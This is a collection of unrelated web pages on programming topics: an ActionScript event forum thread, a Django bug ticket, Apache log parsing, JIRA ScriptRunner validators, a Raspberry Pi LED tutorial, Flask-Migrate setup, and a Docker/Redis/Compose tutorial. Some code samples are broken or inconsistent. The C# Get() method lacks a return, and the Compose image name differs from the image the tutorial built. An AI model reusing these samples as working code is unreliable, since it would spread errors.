Thanks to this approach, we didn't have to do anything special to create a custom network and assign all the containers to it, like we did in the previous post. If you remember, we had to manually create a new network and then, with the docker run command, add some additional parameters to make sure that the containers were connected to it instead of the default Docker bridge. This way, we don't have to worry about the DNS. As long as the container names we have specified inside the Docker Compose file are the same we use in our applications, we're good to go! Docker Compose, under the hood, uses the standard Docker commands. As such, if you run docker ps, you will simply see the 3 containers described in the YAML file up & running:

    PS C:\Users\mpagani\Source\Samples\NetCoreApi> docker ps
    CONTAINER ID   IMAGE                 COMMAND                  CREATED          STATUS          PORTS                  NAMES
    ce786b5fc5f9   qmatteoq/testwebapp   "dotnet TestWebApp.d…"   11 minutes ago   Up 11 minutes   0.0.0.0:8080->80/tcp   webapp
    2ae1e86f8ca4   redis                 "docker-entrypoint.s…"   11 minutes ago   Up 11 minutes   6379/tcp               rediscache
    2e2f08219f68   qmatteoq/webapitest   "dotnet TestWebApi.d…"   11 minutes ago   Up 11 minutes   80/tcp                 newsfeed

We can notice how the configuration we have specified has been respected.
All the containers have the expected names and only the one which hosts the web application is exposing the 80 port on the host. Now just open the browser again and point it to http://localhost:8080 to see the usual website:

If you want to stop your multi-container application, you can just use the docker-compose down command, instead of having to stop all the containers one by one:

    PS C:\Users\mpagani\Source\Samples\NetCoreApi> docker-compose down
    Stopping webapp ... done
    Stopping rediscache ... done
    Stopping newsfeed ... done
    Removing webapp ... done
    Removing rediscache ... done
    Removing newsfeed ... done
    Removing network netcoreapi_default

As you can see, Docker Compose leaves the Docker ecosystem in a clean state. Other than stopping the containers, it also takes care of removing them and removing the network bridge. If you run, in fact, the docker network ls command again, you won't find the one called netcoreapi_default anymore:

    a29b7408ba22        none        null        local

In a similar way as we have seen with Dockerfiles and building images, Visual Studio Code also makes it easier to work with Docker Compose files. Other than providing IntelliSense and real-time documentation, we can right click on the docker-compose.yml file in the File Explorer and have direct access to the basic commands:

Wrapping up

In this post we have concluded the development of our multi-container application. We have added a new layer, a Redis cache, and in doing so we have learned how to consume an existing image as it is. Then we have learned how, thanks to Docker Compose, it's easy to deploy a multi-container application and make sure that all the services are instantiated with the right configuration. You can find the complete sample project used during the various posts on GitHub. Happy coding!
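Stepping back from the deployment details: the cache-aside pattern the GetAsync() method implements is language-neutral. Here is a hedged Python sketch of the same idea, with a plain dict standing in for Redis and a stub in place of the HTTP call (both are stand-ins chosen for this illustration, not part of the original sample).

```python
# Cache-aside in miniature: check the cache, fall back to the source on a
# miss, then populate the cache so the next request is served locally.
cache = {}          # stands in for the Redis database
fetch_count = 0     # counts how often we hit the "network"


def fetch_feed(url):
    """Stub for the HTTP call (HttpClient.GetStringAsync in the C# version)."""
    global fetch_count
    fetch_count += 1
    return f"<rss>posts from {url}</rss>"


def get_feed(url, key="feedRss"):
    rss = cache.get(key)            # StringGetAsync equivalent
    if rss is None:                 # cache miss: go to the source, then store
        rss = fetch_feed(url)
        cache[key] = rss            # StringSetAsync equivalent
    return rss


first = get_feed("https://example.com/feed")
second = get_feed("https://example.com/feed")
print(fetch_count)       # 1 - the second call was served from the cache
print(first == second)   # True
```

A production version would also set an expiration on the cached entry so a stale feed is eventually refreshed.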
https://blogs.msdn.microsoft.com/appconsult/2018/09/14/introduction-to-docker-deploy-a-multi-container-application/
Can't update multiple user picker custom field.

Workflow transition's post function script:

    import com.atlassian.jira.component.ComponentAccessor
    import com.atlassian.jira.user.ApplicationUser;

    def customFieldManager = ComponentAccessor.getCustomFieldManager()
    def userManager = ComponentAccessor.getUserManager()
    def Approvers = customFieldManager.getCustomFieldObjectByName("MultipleUserPicker")

    List<ApplicationUser> newApprovers = [];
    ApplicationUser user = userManager.getUserByKey("user1");
    newApprovers.add(user);
    user = userManager.getUserByKey("user2");
    newApprovers.add(user);

    issue.setCustomFieldValue(Approvers, newApprovers)
    issue.store();

This code gives no errors in the text editor, but when I perform the transition it alerts:

    It seems that you have tried to perform an illegal workflow operation. If you think this message is wrong, please contact your JIRA administrators.

I can't see logs. Does anybody know what is wrong? When I comment out the line "issue.setCustomFieldValue(Approvers, newApprovers)" the alert disappears. Here on this page there is an example only for the (single select) user picker. Thank You!

You should use IssueService, which will do the reindexing for you.
You should be able to replace your script with the one below:

    import com.atlassian.jira.bc.issue.IssueService
    import com.atlassian.jira.component.ComponentAccessor
    import com.atlassian.jira.issue.Issue

    def customFieldManager = ComponentAccessor.getCustomFieldManager()
    def issueService = ComponentAccessor.getComponent(IssueService)
    def approvers = customFieldManager.getCustomFieldObjectByName("MultipleUserPicker")
    def issue = issue as Issue
    def user = ComponentAccessor.jiraAuthenticationContext.loggedInUser

    def issueInputParameters = issueService.newIssueInputParameters()
    // Adding the user names here
    issueInputParameters.addCustomFieldValue(approvers.id, "user1", "user2")

    def updateValidationResult = issueService.validateUpdate(user, issue.id, issueInputParameters)
    if (updateValidationResult.isValid()) {
        issueService.update(user, updateValidationResult)
    }

I changed the names of the custom field and users but it is not working. This script generates no error, but the field is empty. =(( I think I know what happened — the user must have permission to edit? I'll check it... Is it possible to select another user, not the currently logged in one? "Edit issue" is deprecated in our project; we are changing fields in transitions. Each field in its own transition (very strict).

Yes, if the logged in user does not have issue edit permissions it can't be done. You should run it as a user with the correct permissions. You can get a user like so:

    import com.atlassian.jira.component.ComponentAccessor
    import com.atlassian.jira.user.util.UserManager

    def userManager = ComponentAccessor.getComponent(UserManager)
    def user = userManager.getUserByKey("userkey")

Hi Adam, I'm trying to do the same, but what I have is an array / list of users (= MemberUsernames) of which I do not know how many there will be. Do you have a suggestion on how I could do that?
    issueInputParameters.addCustomFieldValue(approvers.id, MemberUsernames)

    def updateValidationResult = issueService.validateUpdate(currentReporterFull, issue.id, issueInputParameters)
    if (updateValidationResult.isValid()) {
        issueService.update(currentReporterFull, updateValidationResult)
    }

Thanks and best regards
Thomas
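One hedged suggestion for Thomas's follow-up (untested here): IssueInputParameters.addCustomFieldValue takes a varargs String array after the field id, so a list of unknown length can be passed by converting it to String[]. This sketch assumes MemberUsernames is a List<String> of user names built earlier in the script, and reuses the variable names from the thread.

```groovy
// Hedged sketch, not verified against a live Jira instance.
// MemberUsernames is assumed to be a List<String> built at runtime.
issueInputParameters.addCustomFieldValue(approvers.id, MemberUsernames as String[])

def updateValidationResult = issueService.validateUpdate(currentReporterFull, issue.id, issueInputParameters)
if (updateValidationResult.isValid()) {
    issueService.update(currentReporterFull, updateValidationResult)
}
```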
https://community.atlassian.com/t5/Marketplace-Apps-questions/Post-script-function-multiple-user-picker-custom-field-update/qaq-p/352376
RSS 2.0 introduces namespaced modules to the simple strand of RSS. The specification document states that a feed may contain elements not described in the core specification, provided they are defined in a namespace. Other than not defining a namespace for the core elements of RSS 2.0, the modules work in the same way as the modules for RSS 1.0: declare the module's namespace in the root element (which in the case of RSS 2.0 is, of course, rss) and then use the module elements as directed by their specification. Parsers that do not recognize the namespace just ignore the new elements.

Whether or not RSS 1.0 modules can be reused within RSS 2.0 is currently a matter of debate. To do so requires the feed author to declare two additional namespaces within the root element: the namespace of the module and the namespace of RDF. Some people find this additional complexity distasteful, and others find the rejection of the additionally powerful metadata a great shame. Still others, however, are using modules that declare the rdf:resource attribute without flinching. While this argument rages (I advise you to check out the relevant mailing lists for the latest blows and parries), we can always bear in mind the simple way to convert between the default module styles, which we will consider now.

RSS 1.0 modules, you will remember, declare everything in terms of RDF resources. This is done with the rdf:resource attribute. For example, a fictional element pet:image, used to denote an image of the feed author's pet, would be written:

    <pet:image rdf:resource="URI_OF_IMAGE" />

whereas in RSS 2.0, the default lack of RDF means you must just declare the URI of the image as a literal string:

    <pet:image>URI_OF_IMAGE</pet:image>

But the differences go deeper than this, as we will now see as we design a new module: mod_Book.
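To make the namespace-declaration step concrete, here is a hedged sketch of how the fictional pet:image element would sit inside each feed type. The namespace URI http://example.org/rss/pet/ and the image URL are invented for this illustration; only the RDF and RSS 1.0 namespace URIs are the real ones.

```xml
<!-- RSS 2.0: the module namespace is declared on the root <rss> element,
     and the value is a plain literal string. -->
<rss version="2.0" xmlns:pet="http://example.org/rss/pet/">
  <channel>
    <title>My Feed</title>
    <pet:image>http://example.org/images/rex.jpg</pet:image>
  </channel>
</rss>

<!-- RSS 1.0: the same data expressed as an RDF resource, which requires
     declaring the RDF namespace as well as the module's. -->
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns="http://purl.org/rss/1.0/"
         xmlns:pet="http://example.org/rss/pet/">
  <channel rdf:about="http://example.org/feed.rdf">
    <title>My Feed</title>
    <pet:image rdf:resource="http://example.org/images/rex.jpg" />
  </channel>
</rdf:RDF>
```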
http://etutorials.org/Misc/rss/Chapter+11.+Developing+New+Modules/11.1+Namespaces+and+Modules+with+RSS+2.0/
CC-MAIN-2017-22
en
refinedweb
Hi,

> On Wed, May 17, 2017 at 02:03:22PM +0200, Ralf Jung wrote:
>> I can confirm that replacing the aforementioned piece of code by just
>>
>> m_indicator.set_icon_full(icon_name, "");
>>
>> (i.e., removing the preprocessor conditional entirely) fixes the
>> problem: The icon is properly shown in the systray.
>
> Please send us a patch against current package

I attached what I dropped in debian/patches.

Kind regards,
Ralf

From: Ralf Jung <p...@ralfj.de>
Date: Wed, 17 May 2017 13:56:19 +0200
X-Dgit-Generated: 1.5.14-2+local 854e73f39b613fda23e95975cf867d90827bd7fd
Subject: assume we always have a new enough Plasma+Qt

---

--- ibus-1.5.14.orig/ui/gtk3/panel.vala
+++ ibus-1.5.14/ui/gtk3/panel.vala
@@ -1372,15 +1372,7 @@
             m_status_icon.set_from_file(icon_name);
         } else if (m_icon_type == IconType.INDICATOR) {
-#if INDICATOR_ENGINE_ICON
             m_indicator.set_icon_full(icon_name, "");
-#else
-            warning("plasma-workspace 5.2 or later is required to " +
-                    "show the absolute path icon %s. Currently check " +
-                    "qtbase 5.4 since there is no way to check " +
-                    "the version of plasma-workspace.", icon_name);
-            m_indicator.set_icon_full("ibus-engine", "");
-#endif
         }
     } else {
         string language = null;
https://www.mail-archive.com/debian-bugs-dist@lists.debian.org/msg1519478.html
CC-MAIN-2017-22
en
refinedweb
In Oracle Fusion Middleware 11g Release 1 (11.1.1), auditing provides a measure of accountability and answers the "who has done what and when" types of questions. This chapter introduces the audit service in Oracle Fusion Middleware. It contains the following topics:

- Section 12.1, "Benefits and Features of the Oracle Fusion Middleware Audit Framework"
- Section 12.2, "Overview of Audit Features"
- Section 12.3, "Oracle Fusion Middleware Audit Framework Concepts"
- Section 12.4, "The Audit Metadata Model"
- Section 12.5, "About Audit Definition Files"

The Oracle Fusion Middleware Audit Framework, introduced in 11g Release 1 (11.1.1), is designed to provide a centralized audit framework for the middleware family of products. The framework provides an audit service for the following:

- Middleware Platform - This includes Java components such as Oracle Platform Security Services (OPSS) and Oracle Web Services. These are components that are leveraged by applications deployed on the middleware. Indirectly, all the deployed applications leveraging these Java components will benefit from the audit framework auditing events that are happening at the platform level.
- Java EE applications - The objective is to provide a service for Java EE applications, including Oracle's own Java EE-based components. Java EE applications are able to create application-specific audit events.
- System Components - For system components in the middleware that are managed by Oracle Process Manager and Notification Server, the audit service also provides an end-to-end structure similar to that for Java components.
- C Components - The framework provides an audit C API for C/C++ based applications to integrate with the audit service.

See Also: Understanding Key Oracle Fusion Middleware Concepts in the Oracle Fusion Middleware Administrator's Guide.

Key features of the Oracle Fusion Middleware Audit Framework and audit service include audit analysis and reporting (see Chapter 14, "Using Audit Analysis and Reporting," for details), along with the following:
- Audit record storage - An audit data store (database) and files (bus-stop) are available. Maintaining a common location for all audit records simplifies maintenance.
- The audit service leverages the SPI infrastructure of Oracle Platform Security Services.
- Utilizes a dynamic metadata model.

This section introduces basic concepts of the Oracle Fusion Middleware Audit Framework.

Figure 12-1 shows the architecture of the Oracle Fusion Middleware Audit Framework. The figure illustrates essential elements of the architecture, including development and run-time services, the audit event flow, and key features, which are described below.

At the heart of the framework is the audit service model, which, like other OPSS services, provides a standards-based, integrated framework for Java EE and SE applications and Oracle components alike. Used across Oracle Fusion Middleware, this model enables you to conveniently leverage the platform's audit features, and includes:

- A dynamic audit metadata model that allows audit clients to manage audit event definitions and make version changes independent of build and release cycles. Audit event definitions can be dynamically updated at redeployment.
- Support for all aspects of the application lifecycle from design to development to deployment.
- A registration service to register your applications to the audit service:
  - declaratively; Java EE applications do so by packaging an XML configuration in ear files in the META-INF directory at deployment.
  - programmatically, by invoking the audit registration API.
  - at the command line, through OPSS scripts.

These APIs are provided by the audit framework for any audit-aware components integrating with the Oracle Fusion Middleware Audit Framework. During runtime, applications may call these APIs where appropriate to manage audit policies and to audit the necessary information about a particular event happening in the application code. The interface allows applications to specify event details such as username and other attributes needed to provide the context of the event being audited. The audit framework provides these APIs:

- audit service API
- audit client API
- audit administration service API

See Chapter 28 for details.
The interface allows applications to specify event details such as username and other attributes needed to provide the context of the event being audited. The audit framework provides these APIs: the audit service API, the audit client API, and the audit administration service API. See Chapter 28 for details.

The process can be illustrated by looking at the actions taken in the framework when an audit event occurs.

The audit metadata store contains audit event definitions for components and for applications integrated with the audit framework. For details, see Section 12.3.3.

The audit data store is the repository of audit event records. It is a database that contains a pre-defined Oracle Fusion Middleware Audit Framework schema, created by Repository Creation Utility (RCU). Once the audit data store is configured, all the audit loaders are aware of the store and upload data to it periodically. The audit data in the store is expected to be cumulative and will grow over time. Ideally, this should not be an operational database used by any other applications; rather, it should be a standalone database used for audit purposes only. The audit database can store audit events generated by Oracle components as well as user applications integrated with the audit framework.

Note: The metadata store is separate from the audit data store. For details about the data store, see Section 12.3.4.

Applications use audit definition files to specify to the audit service the auditing rules (events, filters, and so on) that will govern audit actions. For details, see Section 12.5.

The audit loader is a module of the Oracle WebLogic Server instance and supports audit activity in that instance. When an audit data store is configured, the audit loader is responsible for collecting the audit records for all components running in that instance and loading them to the data store. For Java components, the audit loader is started as part of the container start-up.
For system components, the audit loader is a periodically spawned process that is invoked by OPMN.

Audit filter levels are: None (audit is disabled for the component), Low (definition is component-dependent), Medium (definition is component-dependent), and High (definition is component-dependent).

The audit service model provides a standards-based, integrated framework for Java EE and SE applications to leverage audit features. Bus-stops are local files containing audit data records before they are pushed to the audit data store. Certain audit events implement filters to control when the event is logged. For example, a successful login event for the Oracle Internet Directory component may be filtered for specific users. For details, see Section 13.3, "Managing Audit Policies".

The audit metadata store provides the repository for the metadata model and contains component audit definitions, NLS translation entries, runtime policies, and database mapping tables.

Note: The metadata store is separate from the audit data store, which contains the actual audit data.

The audit metadata store supports several critical auditing functions: The audit registration service creates, modifies, and deletes event definition entries. The audit runtime service retrieves event definitions and runtime policies. The audit data loader creates attribute database mappings to store audit data. Audit MBean commands look up and modify component audit definitions and runtime policies.

The audit framework supports three types of metadata store: XML file-based, database, and LDAP.

When a new application registers to the audit service, the following audit artifacts are stored in the audit store: audit event definitions, including custom attribute groups, categories, events, and filter preset definitions; localized translation entries; the custom attribute-database column mapping table; and run-time audit policies.

As shown in Figure 12-1, reporting is part of the audit event flow. For further details, see Section 12.3.1. The framework supports Oracle Business Intelligence Publisher as a full-featured tool for structured reporting. You can also use your own reporting application.
A large number of pre-defined reports are available in Oracle Business Intelligence Publisher. From the standpoint of an administrator introducing auditing into an environment consisting of Oracle Fusion Middleware components and applications, the key phases of implementing a functional audit system are as follows:

Understand the architecture of the Common Audit Framework. For a review of the essential elements of the framework, the flow of actions, and the features of the audit service model, see Section 12.3.1.

Integrate applications with the audit framework. For details about integration steps, see Section 28.2.

Create the audit definition files that describe your application's audit events and how they map to the audit schema. For details on this topic, see Section 28.3.

Register the application with the audit service. There are various ways to enable registration. For details, see Section 28.4.

Migrate audit information from test to production. See Section 6.6.3.

Generate audit reports. Descriptions of the tools and techniques of audit reporting appear in Chapter 14 and Section 28.7.

The audit framework supports a metadata model which enables applications to specify their audit artifacts in a flexible manner. Applications can dynamically define attribute groups, categories, and events. Topics include: Naming Conventions for Audit Artifacts; Event Categories and Events.

The following naming restrictions apply to category, event, and attribute names:

They must be in English only
They must be less than 26 characters
They can contain only the characters a through z, A through Z, and numbers 0 through 9
They must start with a letter

Attribute groups provide broad classification of audit attributes and consist of three types: The common attribute group contains all the system attributes common to all applications, such as component type, system IP address, hostname, and others. The IAU_COMMON database table contains attributes in this group.
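The naming restrictions listed above are mechanical enough to check automatically. As an illustration only (this validator is not part of any Oracle tooling), a small Python sketch of the documented rules might look like this:

```python
import re

# Pattern encoding the documented rules: must start with a letter,
# then only English letters a-z, A-Z and digits 0-9.
_NAME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9]*$")

def is_valid_audit_name(name):
    """Check a category/event/attribute name against the documented
    restrictions: English letters and digits only, starts with a
    letter, and fewer than 26 characters."""
    return len(name) < 26 and bool(_NAME_RE.match(name))
```

For example, `is_valid_audit_name("UserLogin")` passes, while a name starting with a digit, containing a hyphen, or reaching 26 characters fails.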
Generic attribute groups contain attributes for audit application areas such as authentication and user provisioning. Custom attribute groups are those defined by an application to meet its specific needs. Attributes in a custom group are limited to that component scope. Table 12-1 shows the supported attribute data types and the corresponding Java object types. The common attribute group is stored in the IAU_COMMON database table.

A generic attribute group is defined with a namespace, a version number, and one or more attributes. This example defines an attribute group with namespace authorization and version 1.0:

<AuditConfig xmlns="">
  <Attributes ns="authorization" version="1.0">
    <Attribute displayName="CodeSource" maxLength="2048" name="CodeSource" type="string"/>
    <Attribute displayName="Principals" maxLength="1024" name="Principals" type="string"/>
    <Attribute displayName="InitiatorGUID" maxLength="1024" name="InitiatorGUID" type="string"/>
    <Attribute displayName="Subject" maxLength="1024" name="Subject" type="string">
      <HelpText>Used for subject in authorization</HelpText>
    </Attribute>
  </Attributes>
  ...

Your application can reference the CodeSource attribute like this:

<Attribute name="CodeSource" ns="authorization" version="1.0" />

Each generic attribute group is stored in a dedicated database table. The naming conventions are:

IAU_GENERIC_ATTRIBUTE_GROUP_NAME for table names
IAU_ATTRIBUTE_NAME for table columns

For example, the attribute group authorization is stored in database table IAU_AUTHORIZATION with these columns:

IAU_CODESOURCE as string
IAU_PRINCIPALS as string
IAU_INITIATORGUID as string

A custom attribute group is defined with a namespace, a version number, and one or more attributes. Attributes consist of:

attribute name
data type
attribute-database column mapping order - This property specifies the order in which an attribute is mapped to a database column of a specific data type in the custom attribute table.
help text (optional)
maximum length
display name
size - This property denotes how many values of the same data type the attribute can have. The default size value is 1. A size greater than 1 denotes a multi-valued attribute, which can have two or more values of the same data type. The multi-valued attribute supports all data types except binary.

This example defines attribute group Accounting with namespace accounting and version 1.0:

<Attributes ns="accounting" version="1.0">
  <Attribute name="TransactionType" displayName="Transaction Type" type="string" order="1"/>
  <Attribute name="AccountNumber" displayName="Account Number" type="int" order="2">
    <HelpText>Account number.</HelpText>
  </Attribute>
  ...
</Attributes>

The following example shows a multi-valued attribute named AccountBalance:

<Attribute order="3" displayName="AccountBalance" type="double" name="Balance" size="2" sinceVersion="1.1">
  <MultiValues>
    <MultiValueName displayName="Previous Balance" index="0">
      <HelpText>the previous account balance</HelpText>
    </MultiValueName>
    <MultiValueName displayName="Current Balance" index="1"/>
  </MultiValues>
</Attribute>

Custom attribute groups and attributes are stored in the IAU_CUSTOM table.

An audit event category contains related events in a functional area. For example, a session category could contain login and logout events that are significant in a user session's life cycle. An event category does not itself define attributes. Instead, it references attributes in component and system attribute groups. There are two types of event categories:

System Categories
Component and Application Categories

A system category references common and generic attribute groups and contains audit events. System categories are the base set of component event categories and events. Applications can reference them directly, log audit events, and set filter preset definitions.
The following example shows several elements of the metadata model:

the common attribute group
generic attribute groups identity and authorization
system category UserSession, with an attribute referencing the common attribute AuthenticationMethod
audit events such as UserLogin and UserLogout

<SystemComponent major="1" minor="0">
  <Attributes ns="common" version="1.0"></Attributes>
  <Attributes ns="identity" version="1.0"></Attributes>
  <Attributes ns="authorization" version="1.0"></Attributes>
  <Events>
    <Category name="UserSession" displayName="User Sessions">
      <Attributes>
        <Attribute name="AuthenticationMethod" ns="common" version="1.0" />
      </Attributes>
      <HelpText></HelpText>
      <Event name="UserLogin" displayName="User Logins" shortName="uLogin"></Event>
      <Event name="UserLogout" displayName="User Logouts" shortName="uLogout" xdasName="terminateSession"></Event>
      <Event name="Authentication" displayName="Authentication"></Event>
      <Event name="InternalLogin" displayName="Internal Login" shortName="iLogin" xdasName="CreateSession"></Event>
      <Event name="InternalLogout" displayName="Internal Logout" shortName="iLogout" xdasName="terminateSession"></Event>
      <Event name="QuerySession" displayName="Query Session" shortName="qSession"></Event>
      <Event name="ModifySession" displayName="Modify Session" shortName="mSession"></Event>
    </Category>
    <Category displayName="Authorization" name="Authorization"></Category>
    <Category displayName="ServiceManagement" name="ServiceManagement"></Category>
  </Events>
</SystemComponent>

A component or application can extend system categories or define new component event categories.
In this example, a transaction category references attributes AccountNumber, Date, and Amount from the accounting attribute group, and includes events purchase and deposit:

<Category displayName="Transaction" name="Transaction">
  <Attributes>
    <Attribute name="AccountNumber" ns="accounting" version="1.0"/>
    <Attribute name="Date" ns="accounting" version="1.0" />
    <Attribute name="Amount" ns="accounting" version="1.0" />
  </Attributes>
  <Event displayName="purchase" name="purchase"/>
  <Event displayName="deposit" name="deposit">
    <HelpText>depositing funds.</HelpText>
  </Event>
  ...
</Category>

You extend system categories by creating category references in your application audit definitions. List the system events that the system category includes, and add new attribute references and events to it. In this example, a new category references a system category ServiceManagement with a new attribute reference ServiceTime and a new event restartService:

<CategoryRef name="ServiceManagement" componentType="SystemComponent">
  <Attributes>
    <Attribute name="ServiceTime" ns="accounting" version="1.0" />
  </Attributes>
  <EventRef name="startService"/>
  <EventRef name="stopService"/>
  <Event displayName="restartService" name="restartService">
    <HelpText>restart service</HelpText>
  </Event>
</CategoryRef>

There are two types of definition files:

the component_events.xml definition file
translation files

The component_events.xml file specifies the properties the audit service needs to log audit events, including:

basic properties
the component type, which is the property that applications use to register with the audit service and obtain runtime auditor instances
the major and minor version of the application
at most one custom attribute group
event categories with attribute references and events
component-level filter definitions
runtime policies, which include:
  filterPreset - specifies the audit filter level
  specialUsers - specifies the users to always audit
  maxBusstopDirSize
  maxBusstopFileSize

For details about run-time policies, see Section 13.3. Here is an example component_events.xml file:

<?xml version="1.0"?>
<AuditConfig xmlns="">
  <AuditComponent componentType="ApplicationAudit" major="1" minor="0">
    <Attributes ns="accounting" version="1.0">
      <Attribute name="TransactionType" displayName="Transaction Type" type="string" order="1"/>
      ...
      <Attribute name="Status" displayName="Account Status" type="string" order="5">
        <HelpText>Account status.</HelpText>
      </Attribute>
    </Attributes>
    <Events>
      <Category displayName="Transaction" name="Transaction">
        <Attributes>
          <Attribute name="AccountNumber" ns="accounting" version="1.0" />
          <Attribute name="Date" ns="accounting" version="1.0" />
          <Attribute name="Amount" ns="accounting" version="1.0" />
        </Attributes>
        <Event displayName="purchase" name="purchase">
          <HelpText>direct purchase.</HelpText>
        </Event>
        <Event displayName="deposit" name="deposit">
          <HelpText>depositing funds.</HelpText>
        </Event>
        <Event displayName="withdrawing" name="withdrawing">
          <HelpText>withdrawing funds.</HelpText>
        </Event>
        <Event displayName="payment" name="payment">
          <HelpText>paying bills.</HelpText>
        </Event>
      </Category>
      <Category displayName="Account" name="Account">
        <Attributes>
          <Attribute name="AccountNumber" ns="accounting" version="1.0" />
          <Attribute name="Status" ns="accounting" version="1.0" />
        </Attributes>
        <Event displayName="open" name="open">
          <HelpText>Open a new account.</HelpText>
        </Event>
        <Event displayName="close" name="close">
          <HelpText>Close an account.</HelpText>
        </Event>
        <Event displayName="suspend" name="suspend">
          <HelpText>Suspend an account.</HelpText>
        </Event>
      </Category>
    </Events>
    <FilterPresetDefinitions>
      <FilterPresetDefinition displayName="Low" helpText="" name="Low">
        <FilterCategory enabled="partial"
name="Transaction">deposit.SUCCESSESONLY(HostId -eq "NorthEast"),withdrawing</FilterCategory>
        <FilterCategory enabled="partial" name="Account">open.SUCCESSESONLY,close.FAILURESONLY</FilterCategory>
      </FilterPresetDefinition>
      <FilterPresetDefinition displayName="Medium" helpText="" name="Medium">
        <FilterCategory enabled="partial" name="Transaction">deposit,withdrawing</FilterCategory>
        <FilterCategory enabled="partial" name="Account">open,close</FilterCategory>
      </FilterPresetDefinition>
      <FilterPresetDefinition displayName="High" helpText="" name="High">
        <FilterCategory enabled="partial" name="Transaction">deposit,withdrawing,payment</FilterCategory>
        <FilterCategory enabled="true" name="Account"/>
      </FilterPresetDefinition>
    </FilterPresetDefinitions>
    <Policy filterPreset="Low">
      <CustomFilters>
        <FilterCategory enabled="partial" name="Transaction">purchase</FilterCategory>
      </CustomFilters>
    </Policy>
  </AuditComponent>
</AuditConfig>

Translation files are used to display audit definitions in different languages. The registration service uses certain rules to create the audit metadata for the application. This metadata is used to maintain different versions of the audit definition, and to load audit data and generate reports.

Each audit definition must have a major and a minor version number, which are integers, for example, major=1 and minor=3. Any change to an audit event definition requires that the version ID be modified by changing the minor and/or major number. Version numbers are used by the audit registration service to determine the compatibility of event definitions and attribute mappings between versions.

Note: These version numbers have no relation to Oracle Fusion Middleware version numbers.

Versioning for Oracle Components

When registering an Oracle component such as Oracle Virtual Directory, the audit registration service checks if this is a first-time registration or an upgrade.
For a new registration, the service:

retrieves the component audit and translation information
parses and validates the definition, and stores it in the audit metadata store
generates the attribute-column mapping table, and saves this in the audit metadata store

For upgrades, the current major and minor numbers for the component in the metadata store are compared to the new major and minor numbers to determine whether to proceed with the upgrade.

Versioning for Java EE Applications

When modifying your application's audit definition, it is recommended that you set the major and minor numbers as follows:

Increase only the minor version number when making version-compatible changes, meaning changes in an audit definition such that the attribute database mapping table generated from the new audit definition still works with the audit data created by the previous attribute database mapping table. For example, suppose the current definition version is major=2 and minor=1. When adding a new event that does not affect the attribute database mapping table, you can change the minor version to 2 (minor=2), while the major version remains unchanged (major=2).

Increase the major version number when making version changes where the new mapping table is incompatible with the previous table.

When registering a new component or application, the registration service creates an attribute-to-database column mapping table from the component's custom attributes, and then saves this table to the audit metadata store. Attribute-database mapping tables are required to ensure unique mappings between your application's attribute definitions and database columns. The audit loader uses mapping tables to load data into the audit store; the tables are also used to generate audit reports from the custom database table IAU_CUSTOM.

Viewing Audit Definitions for your Component

You can use the OPSS script command createAuditDBView to create a database view of the audit definitions of your component.
For details about command syntax, see Section C.4.9. Using the createAuditDBView command requires an understanding of how your component's attributes are mapped to database columns; see the discussion below for details.

Understanding the Mapping Table for your Component

A custom attribute-database column mapping has properties of attribute name, database column name, and data type. Each custom attribute must have a mapping order number in its definition. Attributes with the same data type are mapped to the database column in the sequence of attribute mapping order. For example, if the definition file looks like this:

<Attributes ns="accounting" version="1.1">
  <Attribute name="TransactionType" type="string" maxLength="0" displayName="Transaction Type" order="1"/>
  <Attribute name="AccountNumber" type="int" displayName="Account Number" order="2"/>
  <Attribute name="Date" type="dateTime" displayName="Date" order="3"/>
  <Attribute name="Amount" type="float" displayName="Amount" order="4"/>
  <Attribute name="Status" type="string" maxLength="0" displayName="Account Status" order="5"/>
  <Attribute name="Balance" type="float" displayName="Account Balance" order="6"/>
</Attributes>

then the mapping is as follows:

<AttributesMapping ns="accounting" tableName="IAU_CUSTOM" version="1.1">
  <AttributeColumn attribute="TransactionType" column="IAU_STRING_001" datatype="string"/>
  <AttributeColumn attribute="AccountNumber" column="IAU_INT_001" datatype="int"/>
  <AttributeColumn attribute="Date" column="IAU_DATETIME_001" datatype="dateTime"/>
  <AttributeColumn attribute="Amount" column="IAU_FLOAT_001" datatype="float"/>
  <AttributeColumn attribute="Status" column="IAU_STRING_002" datatype="string"/>
  <AttributeColumn attribute="Balance" column="IAU_FLOAT_002" datatype="float"/>
</AttributesMapping>

The version ID of the attribute-database column mapping table matches the version ID of the custom attribute group.
This allows your application to maintain the backward compatibility of attribute mappings across audit definition versions. For more information about versioning, see Section 12.5.3.1.
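The order-within-type mapping convention described above can be made concrete with a short sketch. This Python function is an illustration of the documented convention only (it is not Oracle code): it assigns each attribute the next free column of its data type, reproducing names like IAU_STRING_001 and IAU_FLOAT_002.

```python
from collections import defaultdict

def map_attributes_to_columns(attributes):
    """Given (name, datatype) pairs in mapping order, assign each
    attribute a column named IAU_<DATATYPE>_<NNN>, where NNN counts
    separately per data type, mirroring the documented mapping rule."""
    counters = defaultdict(int)   # how many columns of each type used so far
    mapping = {}
    for name, datatype in attributes:
        counters[datatype] += 1
        mapping[name] = "IAU_%s_%03d" % (datatype.upper(), counters[datatype])
    return mapping
```

Running it on the accounting example above yields the same columns as the generated AttributesMapping: TransactionType and Status (both strings) land in IAU_STRING_001 and IAU_STRING_002, while Amount and Balance (both floats) land in IAU_FLOAT_001 and IAU_FLOAT_002.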
http://docs.oracle.com/cd/E28280_01/core.1111/e10043/audintro.htm
So far we've been working with the React repository on GitHub, but now it's time we started using different repositories as well. Specifically, we want users to be able to choose between React, React Native and Jest in the List component, then load the correct Detail component for each of those. We currently have these two routes defined in index.js:

src/index.js

<Route path="/" component={ List } />
<Route path="/react" component={ Detail } />

You might very well think we just need to extend that like so:

<Route path="/" component={ List } />
<Route path="/react" component={ Detail } />
<Route path="/react-native" component={ Detail } />
<Route path="/jest" component={ Detail } />

That's certainly a possibility, but it's neither flexible nor scalable. Wouldn't it be much better if we could write any link like /detail/??? and have our Detail component figure out what that means? Sure it would. And fortunately React Router makes it easy – in fact it's just a matter of rewriting your routes to this:

src/index.js

<Route path="/" component={ List } />
<Route path="/detail/:repo" component={ Detail } />

Yes, that's it. Just by writing :repo in the URL, React Router will automatically pull out whatever text comes in that part of the URL, then pass it to the Detail component to act on. Sure, we still need to actually do something with the repository name, but it means the Detail component will now work for /detail/react, /detail/react-native and so on.

Given how easy that step was, you're probably imagining there's lots of work to do in the Detail component. Well, you'd be wrong: we have to change just one part of one line in order to make it work. Isn't React Router clever? In Detail.js look for this line inside the fetchFeed() method:

src/pages/Detail.js

